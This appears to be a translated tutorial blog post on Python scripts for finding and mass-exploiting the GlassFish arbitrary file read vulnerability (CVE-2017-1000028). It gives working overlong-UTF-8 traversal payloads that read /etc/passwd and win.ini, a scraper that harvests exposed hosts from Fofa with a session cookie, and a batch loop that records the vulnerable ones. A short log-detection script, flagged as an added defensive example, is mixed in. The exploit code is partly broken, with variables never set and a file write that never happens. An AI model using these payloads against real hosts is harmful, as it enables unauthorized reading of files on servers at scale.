
Batch Search and Exploitation of Vulnerabilities in Python Script Development

2025-03-04 Update From: SLTechnology News&Howtos

Shulou(Shulou.com) 05/31

Next, please follow the editor to study!

Why learn Python development:

(1) To learn the principles behind the relevant security tools.
(2) To be able to write custom tools and extend existing ones for situations in practice where no tool exists or doing the work by hand is too laborious.
(3) It helps with secondary development for bypasses, daily tasks, and batch testing and exploitation.

Disclaimer: It is strictly forbidden to use the tools and techniques mentioned in this article to carry out illegal attacks; otherwise you will bear the consequences yourself, and the uploaders will not bear any responsibility.

Steps to test for vulnerabilities:

(1) Application server GlassFish arbitrary file reading vulnerability.

# Test the GlassFish application server arbitrary file read vulnerability.
import requests  # import the requests module

url = "enter IP address / domain name"

# The following two are the payloads for the vulnerability.
payload_linux = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'  # detects a Linux system
payload_windows = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'  # detects a Windows system

# requests.get sends the GET request; status_code is the HTTP status code of the response.
data_linux = requests.get(url + payload_linux).status_code
data_windows = requests.get(url + payload_windows).status_code

if data_windows == 200 or data_linux == 200:  # 200 means the requested data could be retrieved, so the vulnerability exists
    print("vulnerability exists")
else:
    print("vulnerability does not exist")


(2) Batch search for vulnerabilities (GlassFish arbitrary file read, CVE-2017-1000028).

import base64
import requests
from lxml import etree
import time

# (1) Get address information that may be vulnerable: obtain the targets with the help of Fofa.
# (2) Batch-request the addresses to determine whether the vulnerability exists: single-threaded and multithreaded.
search_data = '"glassfish" && port="4848"'  # the content of the search
headers = {  # Cookie of the logged-in account
    'Cookie': 'HMACCOUNT=52158546FBA65796;result_per_page=20'  # request 20 results per page
}
for yeshu in range(1, 11):  # search the first 10 pages
    url = 'https://fofa.info/result?page=' + str(yeshu) + '&qbase64='  # the front part of the link
    search_data_bs = str(base64.b64encode(search_data.encode("utf-8")), "utf-8")  # Base64-encode the search string
    urls = url + search_data_bs
    print('extracting page ' + str(yeshu))  # print the number of the page being extracted
    try:  # continue even if the request raises an exception
        # Request the URL with the headers above (that is, with the Cookie) and a timeout of 1 second;
        # .content is the body of the response.
        result = requests.get(urls, headers=headers, timeout=1).content
        # Initialise the HTML text with etree.HTML, which builds the XPath parsing object and repairs the HTML.
        soup = etree.HTML(result)
        # The data the crawler wants: the href of every a tag with target="_blank", which is the address.
        ip_data = soup.xpath('//a[@target="_blank"]/@href')
        # print(ip_data)
        # .join() concatenates the elements of a list with the given separator into a new string.
        ipdata = '\n'.join(ip_data)
        print(ip_data)
        with open(r'ip.txt', 'a+') as f:  # open the file ip.txt; f is the name it is bound to
            f.close()  # close the file
    except Exception as e:
        pass


(3) Exploit the vulnerability (GlassFish arbitrary file read, CVE-2017-1000028).

import requests
import time

payload_linux = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'

for ip in open('ip.txt'):  # open the ip.txt file
    ip = ip.replace('\n', '')  # replace the newline character with an empty string
    try:
        # result_code_linux and result_code_windows: the lines that set them are missing from this page.
        print("check->" + ip)  # print which address is being checked
        if result_code_linux == 200 or result_code_windows == 200:
            with open(r'result.txt', 'a+') as f:  # write to the result.txt file
                f.write(ip)  # write the address if the vulnerability exists
        time.sleep(5)
    except Exception as e:
        pass
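Seen from the defending side, the requests built in steps (1) and (3) stand out in a web server access log: each carries the overlong %c0%ae encoding of "." under /theme/META-INF/ and ends in etc/passwd or windows/win.ini. The following is an added example, not part of the original article; the function names, the Common Log Format assumption and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 encodings of '.', '/' and '\' that a strict decoder must reject.
OVERLONG = {b"\xc0\xae": b".", b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}
SENSITIVE = ("etc/passwd", "windows/win.ini")
# Assumed Common Log Format: host ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def normalize(path):
    """Percent-decode, then map overlong sequences to the ASCII they smuggle."""
    raw = unquote_to_bytes(path)
    had_overlong = any(seq in raw for seq in OVERLONG)
    for seq, plain in OVERLONG.items():
        raw = raw.replace(seq, plain)
    return raw.decode("latin-1").replace("\\", "/").lower(), had_overlong

def classify(line):
    """Return None for a benign line, else a finding dict for that request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, _method, path, status = m.groups()
    decoded, had_overlong = normalize(path.split("?", 1)[0])
    traversal = "../" in decoded
    if not (had_overlong or traversal):
        return None
    return {
        "client": host,
        "overlong": had_overlong,
        "traversal": traversal,
        "target": next((s for s in SENSITIVE if decoded.endswith(s)), None),
        # A 200 on such a request means the file was probably served: escalate.
        "served": status == "200",
    }

# Constructed sample log lines (documentation addresses, not real traffic).
DOTS = "%c0%ae%c0%ae/" * 10
SAMPLE = [
    '198.51.100.7 - - [04/Mar/2025:10:00:01 +0000] "GET /theme/META-INF/' + DOTS + 'etc/passwd HTTP/1.1" 200 1432',
    '198.51.100.7 - - [04/Mar/2025:10:00:02 +0000] "GET /theme/META-INF/' + DOTS + 'windows/win.ini HTTP/1.1" 404 0',
    '203.0.113.9 - - [04/Mar/2025:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 512',
]

def findings(lines=SAMPLE):
    """Collect the findings for every suspicious line in the given log lines."""
    return [f for f in map(classify, lines) if f]
```

A finding with "served" set to True is the case to investigate first, since the server answered the traversal request with content instead of an error.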


(4) Exploiting the vulnerability.

At this point, the study of "batch search and exploitation of vulnerabilities in Python script development" is over. I hope it has resolved your doubts. Combining theory with practice helps you learn better, so go and try it! If you want to learn more about related topics, please continue to follow the website; the editor will keep working hard to bring you more practical articles!
